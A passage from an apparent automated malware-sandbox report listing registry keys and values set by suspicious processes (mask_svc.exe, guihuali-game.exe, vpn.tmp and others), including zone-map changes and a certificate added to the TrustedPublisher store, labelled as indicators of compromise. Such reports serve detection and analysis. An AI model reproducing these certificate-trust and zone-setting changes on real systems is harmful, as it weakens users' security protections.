"Visited:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2321 = "Sakhalin Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-571 = "China Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2061 = "North Korea Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2392 = "Aleutian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exerundll32.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeguihuali-game.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{Q4J0B7H3-CLFC-AN4E-8Q18-7Q45PB0I3113}\1 = "22" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 29d723769e29d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7162907a9e29d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings guihuali-game.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000000bf53566a3abbc01c5a36d1b2c67fbb83b1920d2070f385cb0098efcb48522e2b2cd5116a8c1ede0cb81ccc90019cd1e234f9a73fbcdfd0e2aa4 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 36a7e5909e29d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000069aebd9889777ca3af59098c4202f7dff91fa103ce72b9215e76dc35e8771f51aa4fb2cf6633751ee044a0e40fdc0e06d6b1cd58505d43bab0d788d003f48ac50efa7d447ed475603a828af314c35637e01c89186dbcfb439ed9e597f48db20be34d7f54a579f37462b1992f5ad7ec42b500982ea4b0a0e6d71c1a513e64070e09ea647ea8443911cb704a1d6238911a9dfd8674ec59f60e9640dec9a1975637706fc5213e54c35a0861aacf5c06a0b7b6b31afa71d87c9714e673500a4896f6ee7d57cc15c9cef92c23630b1461fad42cc2e8db3a4bce4762ac4b40e795982a70b5591942c3877f815581b93f692e7714ca3da7c4d3259f7733499a5ea04e4da9b5e91fc86124196b99f8faf63e02454d6b9753369183f2b01bbbb1918782743f1f7371f9c50896748e32dae900a8b14845bbc827a353d8a60493e40d6c7525469194a6650efebac8d30b53f3cf3af16ef84cf2c82aa7e39d8e6868856da7eec7ace8826f5cfbe42e0a3e63e1cb7ac5902389698146b7b3655a32200cac69e13a11189b9dce410268d25d29df146812df684fac2218aa4d455271fe45671681c769e2b983e2 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fdafb9bb9e29d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{X6S7Y5Y3-WINZ-VP5O-6V75-6M59ZP1Y8621} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2A7A3K0-ECRB-LM0G-2M91-3G19BV5P5669}\1 = "4668" svchost.exe -
Processes:
vpn.tmpnrl0jkg334t.exeFull Program Features.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created 